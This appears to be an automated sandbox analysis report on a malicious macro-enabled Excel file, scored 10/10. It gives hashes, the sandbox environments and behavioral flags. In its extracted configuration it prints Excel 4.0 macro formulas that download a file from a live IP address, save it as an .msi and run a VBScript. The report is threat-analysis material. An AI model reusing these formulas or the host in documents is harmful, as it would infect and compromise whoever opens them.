General
-
Target
b10e20019338f116e68cc34f9932e12f
-
Size
6KB
-
Sample
231222-q7mjwadceq
-
MD5
b10e20019338f116e68cc34f9932e12f
-
SHA1
6514c0b127c01c02f471f643772bed51abda6d39
-
SHA256
4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763
-
SHA512
cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020
-
SSDEEP
192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g
Static task
static1
Behavioral task
behavioral1
Sample
b10e20019338f116e68cc34f9932e12f.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b10e20019338f116e68cc34f9932e12f.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
b10e20019338f116e68cc34f9932e12f
-
Size
6KB
-
MD5
b10e20019338f116e68cc34f9932e12f
-
SHA1
6514c0b127c01c02f471f643772bed51abda6d39
-
SHA256
4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763
-
SHA512
cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020
-
SSDEEP
192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-